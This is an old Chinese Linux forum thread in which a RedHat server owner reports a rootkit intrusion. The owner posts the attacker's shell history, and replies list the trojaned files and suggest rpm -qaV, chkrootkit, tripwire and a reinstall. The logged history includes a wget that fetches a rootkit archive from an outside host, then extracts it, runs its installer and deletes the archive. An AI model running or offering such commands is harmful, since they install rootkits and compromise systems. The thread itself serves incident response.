求救：系统给黑客用rk.tgz攻击

QJChang · 发表于 2006-2-6 09:57:56

现在很多程序都无法正常使用，历史记录有以下命令
cat /etc/issue
cd /var/tmp
ls -a
wget www.mafiasef.go.ro/rknutza.tgz
ftp
tar xvfz rk.tgz
rm -rf rk.tgz
cd budu
pico hh
nano hh
vi hh
./install
大伙帮我分析解决一下啊！……

晨想 · 发表于 2006-2-6 10:32:36

把 hh 看看都改成什么了。然后把端口封锁。

当然，把所有的里边提到的文件都替换回来。这里肯定都是木马。
文件列表：
ava
ava1
chattr.tgz
crontabs
h
hh
hhh
informatii
install
kde.c
ls
mail
netstat
pico.tgz
ps
sense
sl2
swapd2
sysinfo
top
wget.tgz

最好赶快重装系统，或者至少重新把包都更新一次。

晨想 · 发表于 2006-2-6 10:35:36

尽量别再用root登录，因为密码会被记录的了。
用livecd启动吧。

dancingpig · 发表于 2006-2-7 10:17:03

有rk.tgz包么？？？

晨想 · 发表于 2006-2-7 12:59:47

仔细看帖子，history里边不就有嘛。

Yuri · 发表于 2006-2-7 14:30:17

把包发上来大家烟酒烟酒

kissingwolf · 发表于 2006-2-7 14:58:17

1. 是否是redhat系统?如果是rpm -qaV 看看什么东西被改过了!
2. 下一个chkrootkit ( http://www.chkrootkit.org ) ,自查一下.用相应干净的程序替代!
3. 最好且最简单的办法就是备出重要数据,重装后使用tripwire且定期做监测.

晨想 · 发表于 2006-2-7 15:24:50

Post by Yuri
把包发上来大家烟酒烟酒

是不是该打一下？。看看我上边的帖子。。。

（最近烟酒过多了？嘿嘿）

QJChang · 发表于 2006-2-8 08:33:46

没有包了，已经给入侵者删除掉了！
遇到这样的攻击已经好几次了……
一直都没有办法解决，只能重装，
损失惨重啊……

QJChang · 发表于 2006-2-8 08:38:47

我的服务器全部是RedHat9.0的！
最小化安装，lilo启动方式，除了SSH
,Http端口，其他服务都停止了……

		自动登录	找回密码
密码			注册